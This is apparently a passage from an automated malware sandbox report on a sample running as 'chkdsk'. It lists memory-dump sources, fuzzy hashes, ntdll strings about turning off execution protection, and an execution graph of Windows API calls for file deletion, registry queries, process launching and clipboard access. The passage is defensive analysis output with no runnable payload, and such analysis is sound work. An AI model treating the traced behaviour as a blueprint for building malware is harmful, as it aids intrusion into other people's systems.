                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                                                                                                                                                                                • Instruction ID: 07de468090cda85f8837cbf61f26d507de6ca5aded19429b7f784c0110e721ea
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1D05E617503042BEA10FAA8DC03F263288AB45B40F494064FA49D62C3D960E5008165
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 39bf004f4c6ef762c3b96022e346e95604a096044625012fcc3b0deb70180432
                                                                                                                                                                                                                                • Instruction ID: fc745e755e2542f429b6557d2c37f5cdc87bc1ffefb56e55680a83b45c002dc6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39bf004f4c6ef762c3b96022e346e95604a096044625012fcc3b0deb70180432
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EEB092729064C9DAEB11EB604B0CBAB7A11BBD0B01F66C4A7E2560691E8778C091F276
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 05457550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0549454D
                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05494530
                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 05494507
                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 05494592
                                                                                                                                                                                                                                • Execute=1, xrefs: 0549451E
                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 054944AB
                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05494460
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                • Opcode ID: b0b4d5150ddb8d1c4949999c04f07f311f6fae8ed224c0db6441b01085125a02
                                                                                                                                                                                                                                • Instruction ID: 1c02dc1438d95692bff9930ca9628e8cc58ff4e4f11c35fd16f17878d13b8998
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0b4d5150ddb8d1c4949999c04f07f311f6fae8ed224c0db6441b01085125a02
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E151F8316002197ADF14DBA5DC99FEE77A9FF04360F1404FBEA06A7281EB709A45CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05429046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                                                                • Opcode ID: 7db1533a344ff461f164342cc2ad5f3df6d54c846e6351a24fefcbf530420e20
                                                                                                                                                                                                                                • Instruction ID: 02b5b3e09517fd1116932a03c78ac7ab8423e1e04ecb0ad77a8e32ca08c643d9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7db1533a344ff461f164342cc2ad5f3df6d54c846e6351a24fefcbf530420e20
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B812771D042699BDB25DF54CC45BEEB6B8AF08710F0041EBE90AB7250D7709E859FA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:21.6%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                Total number of Nodes:1354
                                                                                                                                                                                                                                Total number of Limit Nodes:29
                                                                                                                                                                                                                                execution_graph 2926 401941 2927 401943 2926->2927 2932 402da6 2927->2932 2933 402db2 2932->2933 2974 40657a 2933->2974 2936 401948 2938 405c49 2936->2938 3016 405f14 2938->3016 2941 405c71 DeleteFileW 2972 401951 2941->2972 2942 405c88 2943 405da8 2942->2943 3030 40653d lstrcpynW 2942->3030 2943->2972 3059 406873 FindFirstFileW 2943->3059 2945 405cae 2946 405cc1 2945->2946 2947 405cb4 lstrcatW 2945->2947 3051 405e58 lstrlenW 2946->3051 2949 405cc7 2947->2949 2951 405cd7 lstrcatW 2949->2951 2953 405ce2 lstrlenW FindFirstFileW 2949->2953 2951->2953 2953->2943 2965 405d04 2953->2965 2956 405d8b FindNextFileW 2960 405da1 FindClose 2956->2960 2956->2965 2957 405c01 5 API calls 2959 405de3 2957->2959 2961 405de7 2959->2961 2962 405dfd 2959->2962 2960->2943 2966 40559f 24 API calls 2961->2966 2961->2972 2964 40559f 24 API calls 2962->2964 2964->2972 2965->2956 2967 405c49 60 API calls 2965->2967 2971 40559f 24 API calls 2965->2971 3031 40653d lstrcpynW 2965->3031 3032 405c01 2965->3032 3040 40559f 2965->3040 3055 4062fd MoveFileExW 2965->3055 2968 405df4 2966->2968 2967->2965 2970 4062fd 36 API calls 2968->2970 2970->2972 2971->2965 2978 406587 2974->2978 2975 4067aa 2976 402dd3 2975->2976 3007 40653d lstrcpynW 2975->3007 2976->2936 2991 4067c4 2976->2991 2978->2975 2979 406778 lstrlenW 2978->2979 2982 40657a 10 API calls 2978->2982 2983 40668f GetSystemDirectoryW 2978->2983 2985 4066a2 GetWindowsDirectoryW 2978->2985 2986 406719 lstrcatW 2978->2986 2987 40657a 10 API calls 2978->2987 2988 4067c4 5 API calls 2978->2988 2989 4066d1 SHGetSpecialFolderLocation 2978->2989 3000 40640b 2978->3000 3005 406484 wsprintfW 2978->3005 3006 40653d lstrcpynW 2978->3006 2979->2978 2982->2979 2983->2978 2985->2978 2986->2978 2987->2978 2988->2978 2989->2978 2990 4066e9 SHGetPathFromIDListW CoTaskMemFree 2989->2990 2990->2978 2997 4067d1 2991->2997 2992 40684c CharPrevW 2994 406847 2992->2994 2993 40683a CharNextW 2993->2994 2993->2997 2994->2992 2996 40686d 2994->2996 2996->2936 2997->2993 2997->2994 2998 406826 CharNextW 2997->2998 2999 406835 CharNextW 2997->2999 3012 405e39 2997->3012 2998->2997 2999->2993 3008 4063aa 3000->3008 3003 40646f 3003->2978 3004 40643f RegQueryValueExW RegCloseKey 3004->3003 3005->2978 3006->2978 3007->2976 3009 4063b9 3008->3009 3010 4063c2 RegOpenKeyExW 3009->3010 3011 4063bd 3009->3011 3010->3011 3011->3003 3011->3004 3013 405e3f 3012->3013 3014 405e55 3013->3014 3015 405e46 CharNextW 3013->3015 3014->2997 3015->3013 3065 40653d lstrcpynW 3016->3065 3018 405f25 3066 405eb7 CharNextW CharNextW 3018->3066 3021 405c69 3021->2941 3021->2942 3022 4067c4 5 API calls 3028 405f3b 3022->3028 3023 405f6c lstrlenW 3024 405f77 3023->3024 3023->3028 3026 405e0c 3 API calls 3024->3026 3025 406873 2 API calls 3025->3028 3027 405f7c GetFileAttributesW 3026->3027 3027->3021 3028->3021 3028->3023 3028->3025 3029 405e58 2 API calls 3028->3029 3029->3023 3030->2945 3031->2965 3072 406008 GetFileAttributesW 3032->3072 3035 405c2e 3035->2965 3036 405c24 DeleteFileW 3038 405c2a 3036->3038 3037 405c1c RemoveDirectoryW 3037->3038 3038->3035 3039 405c3a SetFileAttributesW 3038->3039 3039->3035 3041 4055ba 3040->3041 3042 40565c 3040->3042 3043 4055d6 lstrlenW 3041->3043 3044 40657a 17 API calls 3041->3044 3042->2956 3045 4055e4 lstrlenW 3043->3045 3046 4055ff 3043->3046 3044->3043 3045->3042 3049 4055f6 lstrcatW 3045->3049 3047 405612 3046->3047 3048 405605 SetWindowTextW 3046->3048 3047->3042 3050 405618 SendMessageW SendMessageW SendMessageW 3047->3050 3048->3047 3049->3046 3050->3042 3052 405e66 3051->3052 3053 405e78 3052->3053 3054 405e6c CharPrevW 3052->3054 3053->2949 3054->3052 3054->3053 3056 406311 3055->3056 3058 40631e 3055->3058 3075 406183 3056->3075 3058->2965 3060 405dcd 3059->3060 3061 406889 FindClose 3059->3061 3060->2972 3062 405e0c lstrlenW CharPrevW 3060->3062 3061->3060 3063 405dd7 3062->3063 3064 405e28 lstrcatW 3062->3064 3063->2957 3064->3063 3065->3018 3067 405ed4 3066->3067 3071 405ee6 3066->3071 3068 405ee1 CharNextW 3067->3068 3067->3071 3069 405f0a 3068->3069 3069->3021 3069->3022 3070 405e39 CharNextW 3070->3071 3071->3069 3071->3070 3073 405c0d 3072->3073 3074 40601a SetFileAttributesW 3072->3074 3073->3035 3073->3036 3073->3037 3074->3073 3076 4061b3 3075->3076 3077 4061d9 GetShortPathNameW 3075->3077 3102 40602d GetFileAttributesW CreateFileW 3076->3102 3079 4062f8 3077->3079 3080 4061ee 3077->3080 3079->3058 3080->3079 3082 4061f6 wsprintfA 3080->3082 3081 4061bd CloseHandle GetShortPathNameW 3081->3079 3084 4061d1 3081->3084 3083 40657a 17 API calls 3082->3083 3085 40621e 3083->3085 3084->3077 3084->3079 3103 40602d GetFileAttributesW CreateFileW 3085->3103 3087 40622b 3087->3079 3088 40623a GetFileSize GlobalAlloc 3087->3088 3089 4062f1 CloseHandle 3088->3089 3090 40625c 3088->3090 3089->3079 3104 4060b0 ReadFile 3090->3104 3095 40627b lstrcpyA 3098 40629d 3095->3098 3096 40628f 3097 405f92 4 API calls 3096->3097 3097->3098 3099 4062d4 SetFilePointer 3098->3099 3111 4060df WriteFile 3099->3111 3102->3081 3103->3087 3105 4060ce 3104->3105 3105->3089 3106 405f92 lstrlenA 3105->3106 3107 405fd3 lstrlenA 3106->3107 3108 405fdb 3107->3108 3109 405fac lstrcmpiA 3107->3109 3108->3095 3108->3096 3109->3108 3110 405fca CharNextA 3109->3110 3110->3107 3112 4060fd GlobalFree 3111->3112 3112->3089 3113 4015c1 3114 402da6 17 API calls 3113->3114 3115 4015c8 3114->3115 3116 405eb7 4 API calls 3115->3116 3117 4015d1 3116->3117 3118 401631 3117->3118 3119 405e39 CharNextW 3117->3119 3129 401617 GetFileAttributesW 3117->3129 3131 4015fa 3117->3131 3137 405b08 3117->3137 3145 405aeb CreateDirectoryW 3117->3145 3120 401663 3118->3120 3121 401636 3118->3121 3119->3117 3123 401423 24 API calls 3120->3123 3133 401423 3121->3133 3130 40165b 3123->3130 3128 40164a SetCurrentDirectoryW 3128->3130 3129->3117 3131->3117 3140 405a6e CreateDirectoryW 3131->3140 3134 40559f 24 API calls 3133->3134 3135 401431 3134->3135 3136 40653d lstrcpynW 3135->3136 3136->3128 3148 40690a GetModuleHandleA 3137->3148 3141 405abb 3140->3141 3142 405abf GetLastError 3140->3142 3141->3131 3142->3141 3143 405ace SetFileSecurityW 3142->3143 3143->3141 3144 405ae4 GetLastError 3143->3144 3144->3141 3146 405aff GetLastError 3145->3146 3147 405afb 3145->3147 3146->3147 3147->3117 3149 406930 GetProcAddress 3148->3149 3150 406926 3148->3150 3152 405b0f 3149->3152 3154 40689a GetSystemDirectoryW 3150->3154 3152->3117 3153 40692c 3153->3149 3153->3152 3155 4068bc wsprintfW LoadLibraryExW 3154->3155 3155->3153 3715 404943 3716 404953 3715->3716 3717 404979 3715->3717 3718 404499 18 API calls 3716->3718 3719 404500 8 API calls 3717->3719 3721 404960 SetDlgItemTextW 3718->3721 3720 404985 3719->3720 3721->3717 3722 401c43 3723 402d84 17 API calls 3722->3723 3724 401c4a 3723->3724 3725 402d84 17 API calls 3724->3725 3726 401c57 3725->3726 3727 401c6c 3726->3727 3728 402da6 17 API calls 3726->3728 3729 402da6 17 API calls 3727->3729 3733 401c7c 3727->3733 3728->3727 3729->3733 3730 401cd3 3732 402da6 17 API calls 3730->3732 3731 401c87 3734 402d84 17 API calls 3731->3734 3736 401cd8 3732->3736 3733->3730 3733->3731 3735 401c8c 3734->3735 3737 402d84 17 API calls 3735->3737 3738 402da6 17 API calls 3736->3738 3739 401c98 3737->3739 3740 401ce1 FindWindowExW 3738->3740 3741 401cc3 SendMessageW 3739->3741 3742 401ca5 SendMessageTimeoutW 3739->3742 3743 401d03 3740->3743 3741->3743 3742->3743 3744 4028c4 3745 4028ca 3744->3745 3746 4028d2 FindClose 3745->3746 3747 402c2a 3745->3747 3746->3747 3751 4016cc 3752 402da6 17 API calls 3751->3752 3753 4016d2 GetFullPathNameW 3752->3753 3754 4016ec 3753->3754 3760 40170e 3753->3760 3756 406873 2 API calls 3754->3756 3754->3760 3755 401723 GetShortPathNameW 3757 402c2a 3755->3757 3758 4016fe 3756->3758 3758->3760 3761 40653d lstrcpynW 3758->3761 3760->3755 3760->3757 3761->3760 3762 401e4e GetDC 3763 402d84 17 API calls 3762->3763 3764 401e60 GetDeviceCaps MulDiv ReleaseDC 3763->3764 3765 402d84 17 API calls 3764->3765 3766 401e91 3765->3766 3767 40657a 17 API calls 3766->3767 3768 401ece CreateFontIndirectW 3767->3768 3769 402638 3768->3769 3770 4045cf lstrcpynW lstrlenW 3771 402950 3772 402da6 17 API calls 3771->3772 3774 40295c 3772->3774 3773 402972 3776 406008 2 API calls 3773->3776 3774->3773 3775 402da6 17 API calls 3774->3775 3775->3773 3777 402978 3776->3777 3799 40602d GetFileAttributesW CreateFileW 3777->3799 3779 402985 3780 402a3b 3779->3780 3781 4029a0 GlobalAlloc 3779->3781 3782 402a23 3779->3782 3783 402a42 DeleteFileW 3780->3783 3784 402a55 3780->3784 3781->3782 3785 4029b9 3781->3785 3786 4032b4 31 API calls 3782->3786 3783->3784 3800 4034e5 SetFilePointer 3785->3800 3788 402a30 CloseHandle 3786->3788 3788->3780 3789 4029bf 3790 4034cf ReadFile 3789->3790 3791 4029c8 GlobalAlloc 3790->3791 3792 4029d8 3791->3792 3793 402a0c 3791->3793 3794 4032b4 31 API calls 3792->3794 3795 4060df WriteFile 3793->3795 3798 4029e5 3794->3798 3796 402a18 GlobalFree 3795->3796 3796->3782 3797 402a03 GlobalFree 3797->3793 3798->3797 3799->3779 3800->3789 3801 401956 3802 402da6 17 API calls 3801->3802 3803 40195d lstrlenW 3802->3803 3804 402638 3803->3804 3805 4014d7 3806 402d84 17 API calls 3805->3806 3807 4014dd Sleep 3806->3807 3809 402c2a 3807->3809 3157 4020d8 3158 4020ea 3157->3158 3168 40219c 3157->3168 3159 402da6 17 API calls 3158->3159 3161 4020f1 3159->3161 3160 401423 24 API calls 3166 4022f6 3160->3166 3162 402da6 17 API calls 3161->3162 3163 4020fa 3162->3163 3164 402110 LoadLibraryExW 3163->3164 3165 402102 GetModuleHandleW 3163->3165 3167 402121 3164->3167 3164->3168 3165->3164 3165->3167 3177 406979 3167->3177 3168->3160 3171 402132 3174 401423 24 API calls 3171->3174 3175 402142 3171->3175 3172 40216b 3173 40559f 24 API calls 3172->3173 3173->3175 3174->3175 3175->3166 3176 40218e FreeLibrary 3175->3176 3176->3166 3182 40655f WideCharToMultiByte 3177->3182 3179 406996 3180 40699d GetProcAddress 3179->3180 3181 40212c 3179->3181 3180->3181 3181->3171 3181->3172 3182->3179 3810 404658 3811 404670 3810->3811 3817 40478a 3810->3817 3818 404499 18 API calls 3811->3818 3812 4047f4 3813 4048be 3812->3813 3814 4047fe GetDlgItem 3812->3814 3819 404500 8 API calls 3813->3819 3815 404818 3814->3815 3816 40487f 3814->3816 3815->3816 3823 40483e SendMessageW LoadCursorW SetCursor 3815->3823 3816->3813 3824 404891 3816->3824 3817->3812 3817->3813 3820 4047c5 GetDlgItem SendMessageW 3817->3820 3821 4046d7 3818->3821 3822 4048b9 3819->3822 3843 4044bb KiUserCallbackDispatcher 3820->3843 3826 404499 18 API calls 3821->3826 3847 404907 3823->3847 3829 4048a7 3824->3829 3830 404897 SendMessageW 3824->3830 3827 4046e4 CheckDlgButton 3826->3827 3841 4044bb KiUserCallbackDispatcher 3827->3841 3829->3822 3834 4048ad SendMessageW 3829->3834 3830->3829 3831 4047ef 3844 4048e3 3831->3844 3834->3822 3836 404702 GetDlgItem 3842 4044ce SendMessageW 3836->3842 3838 404718 SendMessageW 3839 404735 GetSysColor 3838->3839 3840 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3838->3840 3839->3840 3840->3822 3841->3836 3842->3838 3843->3831 3845 4048f1 3844->3845 3846 4048f6 SendMessageW 3844->3846 3845->3846 3846->3812 3850 405b63 ShellExecuteExW 3847->3850 3849 40486d LoadCursorW SetCursor 3849->3816 3850->3849 3851 402b59 3852 402b60 3851->3852 3853 402bab 3851->3853 3856 402d84 17 API calls 3852->3856 3859 402ba9 3852->3859 3854 40690a 5 API calls 3853->3854 3855 402bb2 3854->3855 3857 402da6 17 API calls 3855->3857 3858 402b6e 3856->3858 3860 402bbb 3857->3860 3861 402d84 17 API calls 3858->3861 3860->3859 3862 402bbf IIDFromString 3860->3862 3864 402b7a 3861->3864 3862->3859 3863 402bce 3862->3863 3863->3859 3869 40653d lstrcpynW 3863->3869 3868 406484 wsprintfW 3864->3868 3867 402beb CoTaskMemFree 3867->3859 3868->3859 3869->3867 3319 40175c 3320 402da6 17 API calls 3319->3320 3321 401763 3320->3321 3325 40605c 3321->3325 3323 40176a 3324 40605c 2 API calls 3323->3324 3324->3323 3326 406069 GetTickCount GetTempFileNameW 3325->3326 3327 40609f 3326->3327 3328 4060a3 3326->3328 3327->3326 3327->3328 3328->3323 3870 401d5d 3871 402d84 17 API calls 3870->3871 3872 401d6e SetWindowLongW 3871->3872 3873 402c2a 3872->3873 3597 401ede 3605 402d84 3597->3605 3599 401ee4 3600 402d84 17 API calls 3599->3600 3601 401ef0 3600->3601 3602 401f07 EnableWindow 3601->3602 3603 401efc ShowWindow 3601->3603 3604 402c2a 3602->3604 3603->3604 3606 40657a 17 API calls 3605->3606 3607 402d99 3606->3607 3607->3599 3608 4056de 3609 405888 3608->3609 3610 4056ff GetDlgItem GetDlgItem GetDlgItem 3608->3610 3612 405891 GetDlgItem CreateThread CloseHandle 3609->3612 3613 4058b9 3609->3613 3654 4044ce SendMessageW 3610->3654 3612->3613 3657 405672 5 API calls 3612->3657 3615 4058e4 3613->3615 3616 4058d0 ShowWindow ShowWindow 3613->3616 3617 405909 3613->3617 3614 40576f 3620 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3614->3620 3618 4058f0 3615->3618 3619 405944 3615->3619 3656 4044ce SendMessageW 3616->3656 3624 404500 8 API calls 3617->3624 3622 4058f8 3618->3622 3623 40591e ShowWindow 3618->3623 3619->3617 3629 405952 SendMessageW 3619->3629 3627 4057e4 3620->3627 3628 4057c8 SendMessageW SendMessageW 3620->3628 3630 404472 SendMessageW 3622->3630 3625 405930 3623->3625 3626 40593e 3623->3626 3631 405917 3624->3631 3632 40559f 24 API calls 3625->3632 3633 404472 SendMessageW 3626->3633 3634 4057f7 3627->3634 3635 4057e9 SendMessageW 3627->3635 3628->3627 3629->3631 3636 40596b CreatePopupMenu 3629->3636 3630->3617 3632->3626 3633->3619 3638 404499 18 API calls 3634->3638 3635->3634 3637 40657a 17 API calls 3636->3637 3639 40597b AppendMenuW 3637->3639 3640 405807 3638->3640 3641 405998 GetWindowRect 3639->3641 3642 4059ab TrackPopupMenu 3639->3642 3643 405810 ShowWindow 3640->3643 3644 405844 GetDlgItem SendMessageW 3640->3644 3641->3642 3642->3631 3646 4059c6 3642->3646 3647 405833 3643->3647 3648 405826 ShowWindow 3643->3648 3644->3631 3645 40586b SendMessageW SendMessageW 3644->3645 3645->3631 3649 4059e2 SendMessageW 3646->3649 3655 4044ce SendMessageW 3647->3655 3648->3647 3649->3649 3651 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3649->3651 3652 405a24 SendMessageW 3651->3652 3652->3652 3653 405a4d GlobalUnlock SetClipboardData CloseClipboard 3652->3653 3653->3631 3654->3614 3655->3644 3656->3615 3874 4028de 3875 4028e6 3874->3875 3876 4028ea FindNextFileW 3875->3876 3879 4028fc 3875->3879 3877 402943 3876->3877 3876->3879 3880 40653d lstrcpynW 3877->3880 3880->3879 3881 404ce0 3882 404cf0 3881->3882 3883 404d0c 3881->3883 3892 405b81 GetDlgItemTextW 3882->3892 3885 404d12 SHGetPathFromIDListW 3883->3885 3886 404d3f 3883->3886 3888 404d29 SendMessageW 3885->3888 3889 404d22 3885->3889 3887 404cfd SendMessageW 3887->3883 3888->3886 3890 40140b 2 API calls 3889->3890 3890->3888 3892->3887 3893 401563 3894 402ba4 3893->3894 3897 406484 wsprintfW 3894->3897 3896 402ba9 3897->3896 3898 401968 3899 402d84 17 API calls 3898->3899 3900 40196f 3899->3900 3901 402d84 17 API calls 3900->3901 3902 40197c 3901->3902 3903 402da6 17 API calls 3902->3903 3904 401993 lstrlenW 3903->3904 3905 4019a4 3904->3905 3909 4019e5 3905->3909 3910 40653d lstrcpynW 3905->3910 3907 4019d5 3908 4019da lstrlenW 3907->3908 3907->3909 3908->3909 3910->3907 3911 40166a 3912 402da6 17 API calls 3911->3912 3913 401670 3912->3913 3914 406873 2 API calls 3913->3914 3915 401676 3914->3915 3916 402aeb 3917 402d84 17 API calls 3916->3917 3918 402af1 3917->3918 3919 40292e 3918->3919 3920 40657a 17 API calls 3918->3920 3920->3919 3921 4026ec 3922 402d84 17 API calls 3921->3922 3924 4026fb 3922->3924 3923 402745 ReadFile 3923->3924 3933 402838 3923->3933 3924->3923 3925 4060b0 ReadFile 3924->3925 3927 402785 MultiByteToWideChar 3924->3927 3928 40283a 3924->3928 3930 4027ab SetFilePointer MultiByteToWideChar 3924->3930 3931 40284b 3924->3931 3924->3933 3934 40610e SetFilePointer 3924->3934 3925->3924 3927->3924 3943 406484 wsprintfW 3928->3943 3930->3924 3932 40286c SetFilePointer 3931->3932 3931->3933 3932->3933 3935 40612a 3934->3935 3938 406142 3934->3938 3936 4060b0 ReadFile 3935->3936 3937 406136 3936->3937 3937->3938 3939 406173 SetFilePointer 3937->3939 3940 40614b SetFilePointer 3937->3940 3938->3924 3939->3938 3940->3939 3941 406156 3940->3941 3942 4060df WriteFile 3941->3942 3942->3938 3943->3933 3674 40176f 3675 402da6 17 API calls 3674->3675 3676 401776 3675->3676 3677 401796 3676->3677 3678 40179e 3676->3678 3713 40653d lstrcpynW 3677->3713 3714 40653d lstrcpynW 3678->3714 3681 40179c 3685 4067c4 5 API calls 3681->3685 3682 4017a9 3683 405e0c 3 API calls 3682->3683 3684 4017af lstrcatW 3683->3684 3684->3681 3702 4017bb 3685->3702 3686 406873 2 API calls 3686->3702 3687 406008 2 API calls 3687->3702 3689 4017cd CompareFileTime 3689->3702 3690 40188d 3692 40559f 24 API calls 3690->3692 3691 401864 3693 40559f 24 API calls 3691->3693 3697 401879 3691->3697 3695 401897 3692->3695 3693->3697 3694 40653d lstrcpynW 3694->3702 3696 4032b4 31 API calls 3695->3696 3698 4018aa 3696->3698 3699 4018be SetFileTime 3698->3699 3700 4018d0 CloseHandle 3698->3700 3699->3700 3700->3697 3703 4018e1 3700->3703 3701 40657a 17 API calls 3701->3702 3702->3686 3702->3687 3702->3689 3702->3690 3702->3691 3702->3694 3702->3701 3708 405b9d MessageBoxIndirectW 3702->3708 3712 40602d GetFileAttributesW CreateFileW 3702->3712 3704 4018e6 3703->3704 3705 4018f9 3703->3705 3706 40657a 17 API calls 3704->3706 3707 40657a 17 API calls 3705->3707 3709 4018ee lstrcatW 3706->3709 3710 401901 3707->3710 3708->3702 3709->3710 3711 405b9d MessageBoxIndirectW 3710->3711 3711->3697 3712->3702 3713->3681 3714->3682 3944 401a72 3945 402d84 17 API calls 3944->3945 3946 401a7b 3945->3946 3947 402d84 17 API calls 3946->3947 3948 401a20 3947->3948 3949 401573 3950 401583 ShowWindow 3949->3950 3951 40158c 3949->3951 3950->3951 3952 402c2a 3951->3952 3953 40159a ShowWindow 3951->3953 3953->3952 3954 4023f4 3955 402da6 17 API calls 3954->3955 3956 402403 3955->3956 3957 402da6 17 API calls 3956->3957 3958 40240c 3957->3958 3959 402da6 17 API calls 3958->3959 3960 402416 GetPrivateProfileStringW 3959->3960 3961 4014f5 SetForegroundWindow 3962 402c2a 3961->3962 3963 401ff6 3964 402da6 17 API calls 3963->3964 3965 401ffd 3964->3965 3966 406873 2 API calls 3965->3966 3967 402003 3966->3967 3969 402014 3967->3969 3970 406484 wsprintfW 3967->3970 3970->3969 3971 401b77 3972 402da6 17 API calls 3971->3972 3973 401b7e 3972->3973 3974 402d84 17 API calls 3973->3974 3975 401b87 wsprintfW 3974->3975 3976 402c2a 3975->3976 3977 40167b 3978 402da6 17 API calls 3977->3978 3979 401682 3978->3979 3980 402da6 17 API calls 3979->3980 3981 40168b 3980->3981 3982 402da6 17 API calls 3981->3982 3983 401694 MoveFileW 3982->3983 3984 4016a7 3983->3984 3990 4016a0 3983->3990 3986 406873 2 API calls 3984->3986 3988 4022f6 3984->3988 3985 401423 24 API calls 3985->3988 3987 4016b6 3986->3987 3987->3988 3989 4062fd 36 API calls 3987->3989 3989->3990 3990->3985 3991 4019ff 3992 402da6 17 API calls 3991->3992 3993 401a06 3992->3993 3994 402da6 17 API calls 3993->3994 3995 401a0f 3994->3995 3996 401a16 lstrcmpiW 3995->3996 3997 401a28 lstrcmpW 3995->3997 3998 401a1c 3996->3998 3997->3998 3999 4022ff 4000 402da6 17 API calls 3999->4000 4001 402305 4000->4001 4002 402da6 17 API calls 4001->4002 4003 40230e 4002->4003 4004 402da6 17 API calls 4003->4004 4005 402317 4004->4005 4006 406873 2 API calls 4005->4006 4007 402320 4006->4007 4008 402331 lstrlenW lstrlenW 4007->4008 4009 402324 4007->4009 4011 40559f 24 API calls 4008->4011 4010 40559f 24 API calls 4009->4010 4012 40232c 4009->4012 4010->4012 4013 40236f SHFileOperationW 4011->4013 4013->4009 4013->4012 4014 401000 4015 401037 BeginPaint GetClientRect 4014->4015 4016 40100c DefWindowProcW 4014->4016 4018 4010f3 4015->4018 4021 401179 4016->4021 4019 401073 CreateBrushIndirect FillRect DeleteObject 4018->4019 4020 4010fc 4018->4020 4019->4018 4022 401102 CreateFontIndirectW 4020->4022 